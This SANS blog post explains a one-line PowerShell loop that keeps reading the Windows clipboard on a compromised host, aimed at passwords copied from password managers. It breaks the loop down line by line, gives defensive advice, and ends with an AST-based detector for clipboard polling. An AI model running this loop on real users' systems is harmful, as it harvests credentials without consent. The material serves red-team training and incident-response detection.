Month of PowerShell: Abusing Get-Clipboard

One of my favorite tools to use in a penetration test or red team engagement after exploiting a Windows 10 system: Get-Clipboard

Authored by SANS Institute

#monthofpowershell

Quick article today about one of my favorite tools to use in a penetration test or red-team engagement after exploiting a Windows 10 system: [code]Get-Clipboard[/code].

[code]Get-Clipboard[/code] retrieves the contents of the clipboard. It sounds pretty straightforward, but it can also be a big information disclosure threat. An attacker who gains access to the logged-in user session can set up a loop to capture and display the clipboard contents every time it changes. Here is the 1-line PowerShell clipboard script I use:

[code]$x=""; while($true) { $y=get-clipboard -raw; if ($x -ne $y) { Write-Host $y; $x=$y } ; Sleep 1 }[/code]

Let's break down this 1-line script piece-by-piece:

  • [code]$x="";[/code]: Declare an empty variable [code]$x[/code]; we'll use this to hold the contents of the clipboard
  • [code]while($true) {[/code]: Start a loop that continues until interrupted
  • [code]$y=get-clipboard -raw;[/code]: Get the contents of the clipboard, storing it in [code]$y[/code]; the [code]-Raw[/code] argument returns multiline clipboard contents as a single string instead of an array
  • [code]if ($x -ne $y) {[/code]: If the [code]$y[/code] clipboard contents are different from what we saw in [code]$x[/code], then execute the following block of statements.
  • [code]Write-Host $y;[/code]: Write the new clipboard contents to the host (screen)
  • [code]$x=$y[/code]: Set [code]$x[/code] to be equal to [code]$y[/code] so we don't print the changed clipboard contents more than once
  • [code]} ;[/code]: End the earlier [code]if[/code] block
  • [code]Sleep 1[/code]: Wait 1 second before checking the clipboard again
  • [code]}[/code]: End the earlier [code]while($true)[/code] loop

Running this command on a Windows host will reveal anything copied into the clipboard, but it is particularly useful when the victim uses a password manager.

Password managers often make use of the clipboard to share password information between applications. Many clipboard managers will clear a password from the clipboard after a few minutes to prevent it from being disclosed, but an active attacker can interrogate the clipboard for password information very quickly.

Here's an example of this script in use on a macOS system against the 1Password password manager.

Attacks against the clipboard aren't new, and they affect a lot of platforms. Where possible, avoid using the clipboard for sensitive data like passwords (use the password manager browser plugin where possible, for example). Otherwise, recognize the clipboard as a weak point in most operating systems, and conduct your incident response investigations accordingly.

-Joshua Wright
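
For the incident-response side of the advice above, here is an added example (not code from the original article) that parses script text with the PowerShell AST and flags a [code]Get-Clipboard[/code] call that sits inside a loop, which is the shape of the polling one-liner. The function name [code]Test-ClipboardPolling[/code] and the sample strings are constructed for illustration.

```powershell
function Test-ClipboardPolling {
    param([Parameter(Mandatory)][string]$ScriptText)

    # Parse the text into an AST instead of string matching, so spacing and case do not matter.
    $tokens = $null; $errors = $null
    $ast = [System.Management.Automation.Language.Parser]::ParseInput(
        $ScriptText, [ref]$tokens, [ref]$errors)

    # Every command invocation in the script, including those in nested blocks.
    $commands = $ast.FindAll(
        { param($node) $node -is [System.Management.Automation.Language.CommandAst] }, $true)

    foreach ($cmd in $commands) {
        # Drop any module qualifier, then match the cmdlet or its built-in alias gcb.
        $name = $cmd.GetCommandName() -replace '^.*\\', ''
        if ($name -notin 'Get-Clipboard', 'gcb') { continue }

        # Walk up the tree: a clipboard read with a loop statement as ancestor is polling.
        for ($p = $cmd.Parent; $null -ne $p; $p = $p.Parent) {
            if ($p -is [System.Management.Automation.Language.LoopStatementAst]) { return $true }
        }
    }
    return $false
}

# Constructed sample script texts, standing in for logged script blocks.
$samples = [ordered]@{
    'polling loop from the article' = '$x=""; while($true) { $y=get-clipboard -raw; if ($x -ne $y) { Write-Host $y; $x=$y } ; Sleep 1 }'
    'single clipboard read'         = 'Get-Clipboard | Set-Content notes.txt'
    'alias inside do/until'         = 'do { gcb -Raw; Start-Sleep 5 } until ($false)'
    'loop without clipboard access' = 'foreach ($f in (Get-ChildItem)) { $f.Name }'
}

foreach ($name in $samples.Keys) {
    [pscustomobject]@{
        Sample           = $name
        ClipboardPolling = Test-ClipboardPolling -ScriptText $samples[$name]
    }
}
```

On a live host the same function can be fed the script text recorded in event ID 4104 of the Microsoft-Windows-PowerShell/Operational log when script block logging is enabled. It does not see clipboard reads made through direct .NET calls or pipeline-based loops such as [code]ForEach-Object[/code].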


Joshua Wright is the author of SANS SEC504: Hacker Tools, Techniques, and Incident Handling, a faculty fellow for the SANS Institute, and a senior technical director at Counter Hack.
